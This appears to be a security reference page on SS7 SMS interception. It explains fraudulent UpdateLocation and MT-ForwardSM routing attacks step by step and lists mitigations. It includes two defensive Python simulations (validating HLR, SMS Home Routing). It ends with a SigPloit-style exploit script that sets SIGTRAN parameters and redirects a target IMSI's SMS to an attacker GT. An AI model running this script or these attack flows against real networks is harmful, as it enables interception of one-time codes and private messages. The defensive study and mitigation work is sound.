SS7 SMS Interception Attacks
Methods to intercept text messages
SS7 SMS interception attacks exploit vulnerabilities in the Signaling System No. 7 protocol to capture text messages intended for a target subscriber. These attacks manipulate the network's routing information to redirect SMS messages through an attacker-controlled path, allowing the attacker to read sensitive information, including authentication codes, private communications, and confidential data.
Security Implications
- Interception of two-factor authentication codes
- Capture of banking transaction notifications
- Access to private communications
- Compromise of business communications
- Interception of one-time passwords (OTPs)
- Capture of sensitive personal information
Technical Prerequisites
- Access to SS7 network (direct or via compromised operator)
- Knowledge of target's MSISDN (phone number) and IMSI
- SS7 message crafting capabilities
- Global Title (GT) spoofing ability
- SMS routing infrastructure
- SMS forwarding capabilities to avoid detection
SMS Interception Techniques
Technical Details
This attack combines two SS7 MAP operations, UpdateLocation and InsertSubscriberData, to redirect SMS delivery to an attacker-controlled network element posing as the subscriber's VLR. It is similar to the call interception attack but specifically targets SMS traffic.
First, the attacker sends a fraudulent UpdateLocation message to the target's HLR, impersonating a VLR under the attacker's control: the VLR number carried in the MAP payload (and normally the SCCP calling-party GT as well) points at the attacker's GT. This tricks the HLR into believing the subscriber has roamed onto the attacker's network.
The HLR then sends InsertSubscriberData to the attacker's fake VLR, providing the subscriber profile (MSISDN, subscribed services, barring and forwarding settings). The attacker acknowledges this data, completing the location update, and the HLR sends CancelLocation to the VLR that was genuinely serving the subscriber.
Once the HLR has updated its records, every SendRoutingInfoForSM query an SMSC makes for the target's MSISDN is answered with the attacker's GT as the serving MSC, so the SMSC delivers MT-ForwardSM to the attacker instead of to the subscriber. The attacker can read each message and optionally forward it to the actual recipient so that nothing appears to be missing.
Attack Flow
- Attacker obtains target's MSISDN (phone number) and IMSI (the IMSI is typically obtained with a SendRoutingInfoForSM query for the MSISDN, which an HLR without Home Routing answers with the IMSI and serving MSC)
- Attacker crafts an UpdateLocation message with the target's IMSI
- Attacker sets the VLR address to a GT under their control
- Message is sent to target's home network HLR
- HLR processes the request without adequate authentication
- HLR updates its database with the new VLR location
- HLR sends InsertSubscriberData to the attacker's fake VLR
- Attacker acknowledges receipt of subscriber data
- HLR sends CancelLocation to the legitimate VLR
- All incoming SMS messages are now delivered to the attacker's GT, because the HLR answers every SMSC routing query with it
- Attacker can read messages and forward them to hide the attack
Mitigation
- Implement UL validation and SMS Home Routing
- Verify the SCCP calling-party GT against the known VLR GT ranges of roaming partners, and check that it agrees with the VLR number carried inside the MAP payload
- Check for suspicious location changes (e.g., international jumps)
- Implement velocity checking to detect impossible movement patterns
- Monitor for multiple rapid location updates
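The following is an added example, not code from the page or from any SS7 tool, that models the UpdateLocation redirection in the attack flow above and the UL-validation checks in the mitigation list as two toy HLR implementations. The HLR classes, GT prefixes, region table, travel times, subscriber records and timestamps are all constructed for illustration; real HLR or STP validation works on the same inputs (SCCP calling-party GT, MAP VLR number, time since the last update) but against live roaming-partner data.

```python
# Added example, not the page's code: two toy HLRs, one that trusts every
# UpdateLocation (the attack flow above) and one that applies the UL validation
# checks from the mitigation list. All GTs, IMSIs, regions, travel times and
# timestamps are constructed.
from dataclasses import dataclass, field

REGION_OF_PREFIX = {"316": "NL", "4915": "DE", "2348": "NG"}  # constructed GT ranges
MIN_TRAVEL_SECONDS = {                                          # constructed, per region pair
    frozenset({"NL", "DE"}): 3600,
    frozenset({"NL", "NG"}): 6 * 3600,
    frozenset({"DE", "NG"}): 6 * 3600,
}
MAX_UPDATES_PER_HOUR = 3


def region_of(gt):
    for prefix, region in REGION_OF_PREFIX.items():
        if gt.startswith(prefix):
            return region
    return "UNKNOWN"


@dataclass
class UpdateLocation:
    imsi: str
    vlr_gt: str     # VLR number carried in the MAP payload
    origin_gt: str  # SCCP calling-party GT the message arrived from
    sent_at: float  # constructed clock, in seconds


@dataclass
class Subscriber:
    imsi: str
    msisdn: str
    vlr_gt: str
    last_update: float = 0.0
    recent_updates: list = field(default_factory=list)


class NaiveHLR:
    """Trusts every UpdateLocation, as in the attack flow above."""

    def __init__(self, subscribers):
        self.db = {s.imsi: s for s in subscribers}
        self.sent = []  # (MAP operation, destination GT) emitted by the HLR

    def update_location(self, ul):
        sub = self.db.get(ul.imsi)
        if sub is None:
            return "UnknownSubscriber"
        old_vlr, sub.vlr_gt, sub.last_update = sub.vlr_gt, ul.vlr_gt, ul.sent_at
        sub.recent_updates.append(ul.sent_at)
        self.sent.append(("InsertSubscriberData", ul.vlr_gt))  # profile to the new VLR
        self.sent.append(("CancelLocation", old_vlr))          # detach the old VLR
        return "OK"

    def sri_sm(self, msisdn):
        """SendRoutingInfoForSM: whatever VLR is on record is where MT-ForwardSM goes."""
        for sub in self.db.values():
            if sub.msisdn == msisdn:
                return {"imsi": sub.imsi, "msc_gt": sub.vlr_gt}
        return None


class ValidatingHLR(NaiveHLR):
    """Runs the mitigation-list checks before accepting an UpdateLocation."""

    def __init__(self, subscribers, partner_prefixes):
        super().__init__(subscribers)
        self.partner_prefixes = tuple(partner_prefixes)
        self.alerts = []  # (reason, imsi, origin GT) for the SOC

    def _reject(self, reason, ul):
        self.alerts.append((reason, ul.imsi, ul.origin_gt))
        return "Rejected"

    def update_location(self, ul):
        sub = self.db.get(ul.imsi)
        if sub is None:
            return "UnknownSubscriber"
        if not ul.origin_gt.startswith(self.partner_prefixes):  # known roaming partner?
            return self._reject("unknown_source_gt", ul)
        if ul.origin_gt != ul.vlr_gt:  # SCCP GT must agree with the MAP VLR number
            return self._reject("vlr_gt_mismatch", ul)
        old_region, new_region = region_of(sub.vlr_gt), region_of(ul.vlr_gt)
        needed = MIN_TRAVEL_SECONDS.get(frozenset({old_region, new_region}), 0)
        if old_region != new_region and ul.sent_at - sub.last_update < needed:
            return self._reject("impossible_travel", ul)  # velocity check
        if sum(ul.sent_at - t < 3600 for t in sub.recent_updates) >= MAX_UPDATES_PER_HOUR:
            return self._reject("rapid_updates", ul)
        return super().update_location(ul)


def run_scenarios():
    """Replay the attack against both HLRs with constructed data."""
    imsi, msisdn, home_vlr = "204080123456789", "31612345678", "31612340000"
    attacker_gt, partner_gt = "2348012340000", "4915112340000"
    blatant = UpdateLocation(imsi, attacker_gt, attacker_gt, sent_at=1100.0)
    spoofed = UpdateLocation(imsi, partner_gt, partner_gt, sent_at=1100.0)  # spoofed partner GT
    genuine = UpdateLocation(imsi, partner_gt, partner_gt, sent_at=8200.0)  # real roaming, 2 h later

    naive = NaiveHLR([Subscriber(imsi, msisdn, home_vlr, last_update=1000.0)])
    naive_status = naive.update_location(blatant)
    strict = ValidatingHLR([Subscriber(imsi, msisdn, home_vlr, last_update=1000.0)], ("316", "4915"))
    statuses = (strict.update_location(blatant), strict.update_location(spoofed))
    msc_after_attack = strict.sri_sm(msisdn)["msc_gt"]
    genuine_status = strict.update_location(genuine)
    return {
        "naive": (naive_status, naive.sri_sm(msisdn)["msc_gt"]),
        "strict": statuses + (msc_after_attack, genuine_status),
        "alerts": [reason for reason, _, _ in strict.alerts],
    }


if __name__ == "__main__":
    print(run_scenarios())
```

The naive HLR hands the attacker's GT to every SMSC that asks, which is the whole attack. The allowlist alone is not enough against the validating HLR either: GT spoofing is listed among the prerequisites, and the spoofed scenario carries a calling GT that looks like a roaming partner. It is the velocity check that rejects it, which is why the checks are layered rather than relied on individually.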
Technical Details
The MT-ForwardSM (Mobile Terminated Forward Short Message) MAP operation delivers an SMS from the SMSC to the serving MSC/VLR: the SMSC first asks the HLR for routing information with SendRoutingInfoForSM, then sends MT-ForwardSM to the MSC GT the HLR returned, with the recipient's IMSI in the MAP payload.
In this attack, the attacker manipulates the SMS routing path by intercepting and modifying MT-ForwardSM messages. This can be done by positioning themselves in the signaling path or by manipulating routing tables in compromised network elements.
The attacker can capture the SMS content, potentially modify it, and then forward it to the intended recipient to avoid detection. This attack is particularly effective against SMS messages containing sensitive information like one-time passwords or banking notifications.
Attack Flow
- Attacker obtains target's MSISDN and identifies their serving MSC/VLR (for example from the HLR's SendRoutingInfoForSM response)
- Attacker positions themselves in the signaling path or compromises routing
- When an SMS is sent to the target, the SMSC queries the HLR for routing information (SendRoutingInfoForSM)
- SMSC sends MT-ForwardSM message toward the target's MSC/VLR
- The message is intercepted by the attacker due to routing manipulation
- Attacker extracts and reads the SMS content
- Attacker forwards the message to the actual recipient to avoid detection
- Target receives the message with no indication of interception
Mitigation
- Implement SMS path validation
- Secure routing tables against unauthorized modifications
- Monitor for unusual SMS routing patterns
- Consider end-to-end encryption for sensitive content, or move one-time codes off SMS entirely, since the transport network cannot protect an SMS payload in transit
- Implement SMS Home Routing, so that SendRoutingInfoForSM queries from outside the home network are answered with the home SMS Router's GT and a correlation ID rather than the subscriber's real IMSI and serving MSC
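Added example (not the page's code) of the SMS Home Routing mitigation, which addresses the MT-ForwardSM path manipulation described in this section and also closes the IMSI disclosure that the UpdateLocation attack above depends on. HomeRoutingHLR, SMSRouter, the correlation-ID scheme, the GT prefixes, IMSIs and message texts are all constructed; production SMS Routers follow the same idea (3GPP TR 23.840) but keep correlation records for a short TTL instead of single use.

```python
# Added example of SMS Home Routing (not the page's code): an HLR that answers
# SendRoutingInfoForSM from outside the home network with the SMS Router's GT
# and a one-time correlation ID, and a router that only delivers MT-ForwardSM
# carrying an ID it issued. All GTs, IMSIs and messages are constructed.
import secrets
from dataclasses import dataclass

HOME_MCC_MNC = "20408"         # constructed home PLMN
HOME_GT_PREFIXES = ("316",)    # constructed GT range of home-network nodes
SMS_ROUTER_GT = "31612349999"  # constructed GT of the home SMS Router


@dataclass
class Subscriber:
    imsi: str
    msisdn: str
    msc_gt: str  # real serving MSC, never disclosed outside the home network


class HomeRoutingHLR:
    def __init__(self, subscribers):
        self.by_msisdn = {s.msisdn: s for s in subscribers}
        self.correlations = {}  # correlation ID -> MSISDN, shared with the router

    def sri_sm(self, msisdn, calling_gt):
        sub = self.by_msisdn.get(msisdn)
        if sub is None:
            return None
        if calling_gt.startswith(HOME_GT_PREFIXES):
            # Home-network SMSC: real routing information, as before.
            return {"imsi": sub.imsi, "msc_gt": sub.msc_gt}
        # External querier: hand out the router's GT and a correlation ID that is
        # shaped like an IMSI (same MCC/MNC) so the sender routes it normally.
        corr = HOME_MCC_MNC + "".join(str(secrets.randbelow(10)) for _ in range(10))
        self.correlations[corr] = msisdn
        return {"imsi": corr, "msc_gt": SMS_ROUTER_GT}


class SMSRouter:
    def __init__(self, hlr):
        self.hlr = hlr
        self.delivered = []  # (real MSC GT, MSISDN, text): the internal leg
        self.dropped = []    # (calling GT, IMSI field, reason): for the SOC

    def mt_forward_sm(self, imsi_field, calling_gt, text):
        # Correlation IDs are single-use here; production routers expire them
        # after a short TTL instead so that legitimate retries still work.
        msisdn = self.hlr.correlations.pop(imsi_field, None)
        if msisdn is None:
            real_imsis = {s.imsi for s in self.hlr.by_msisdn.values()}
            reason = ("real IMSI used: sender bypassed home routing"
                      if imsi_field in real_imsis else "unknown correlation ID")
            self.dropped.append((calling_gt, imsi_field, reason))
            return "Rejected"
        sub = self.hlr.by_msisdn[msisdn]
        self.delivered.append((sub.msc_gt, msisdn, text))
        return "OK"


def run_scenarios():
    """Constructed exchanges: a foreign SMSC, then an attacker probing and replaying."""
    real_imsi, msisdn, real_msc = "204080123456789", "31612345678", "31612340000"
    hlr = HomeRoutingHLR([Subscriber(real_imsi, msisdn, real_msc)])
    router = SMSRouter(hlr)
    foreign_smsc, attacker = "4915112340000", "2348012340000"

    # 1. Legitimate foreign SMSC learns neither the IMSI nor the MSC, yet delivers.
    info = hlr.sri_sm(msisdn, foreign_smsc)
    delivery = router.mt_forward_sm(info["imsi"], foreign_smsc, "Your code is 482913")
    # 2. Attacker probing for the IMSI gets a correlation ID instead.
    probe = hlr.sri_sm(msisdn, attacker)
    # 3. Replaying the already-used correlation ID is refused.
    replay = router.mt_forward_sm(info["imsi"], attacker, "replayed")
    # 4. An attacker who knows the real IMSI from elsewhere cannot deliver through the router.
    bypass = router.mt_forward_sm(real_imsi, attacker, "spoofed")
    return {
        "foreign_leaked_imsi": info["imsi"] == real_imsi,
        "foreign_msc": info["msc_gt"],
        "delivered_to": [d[0] for d in router.delivered],
        "probe_leaked_imsi": probe["imsi"] == real_imsi,
        "probe_shape_ok": probe["imsi"].startswith(HOME_MCC_MNC) and len(probe["imsi"]) == 15,
        "results": (delivery, replay, bypass),
        "drop_reasons": [d[2] for d in router.dropped],
    }


if __name__ == "__main__":
    print(run_scenarios())
```

With this in place the external leg of every MT-ForwardSM terminates at the home SMS Router, and the leg to the real MSC never leaves the home network, so an attacker positioned on the interconnect has no real MSC GT to intercept traffic for and no IMSI to put into a forged UpdateLocation. The router's drop log is also a useful detection source: an MT-ForwardSM that arrives with a real IMSI from a foreign GT means the sender obtained that IMSI some other way.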
Exploitation Example
# The sigploit.ss7.interception module and the insertSubscriberData.modify_sms_routing()
# call are shown here as the page presents them; check the module path and the
# function signature against the SigPloit version you actually have before relying on them.
from sigploit.ss7.interception import insertSubscriberData

# Target IMSI (15 digits: MCC 204, MNC 08, MSIN 0123456789)
target_imsi = '204080123456789'

# Attacker's parameters: the GT the HLR will record as the serving VLR/MSC,
# and the SMSC address passed to the tool's attacker_smsc parameter
attacker_gt = '20408999999'
attacker_sms_center = '20408888888'

# SS7-over-IP (SIGTRAN) connection parameters
ss7_params = {
    'sctp_port': 2905,        # M3UA
    'target_ip': '10.0.0.1',  # peer signalling gateway / STP
    'source_pc': 1,           # our point code
    'destination_pc': 2,      # point code on the HLR's side
    'source_ssn': 8,          # SSN 8 = MSC (we pose as a VLR/MSC)
    'destination_ssn': 6      # SSN 6 = HLR
}

# Execute the attack: rewrite the target's SMS routing so delivery is steered to attacker_gt
result = insertSubscriberData.modify_sms_routing(
    target_imsi=target_imsi,
    attacker_gt=attacker_gt,
    attacker_smsc=attacker_sms_center,
    **ss7_params
)
print(f"Attack status: {result.get('status')}")
print(f"VLR response: {result.get('response')}")
Ethical Considerations
This code is provided for educational purposes only. Intercepting SMS messages without consent is illegal in most jurisdictions and violates privacy laws. Always obtain proper authorization before conducting security testing on telecommunications networks.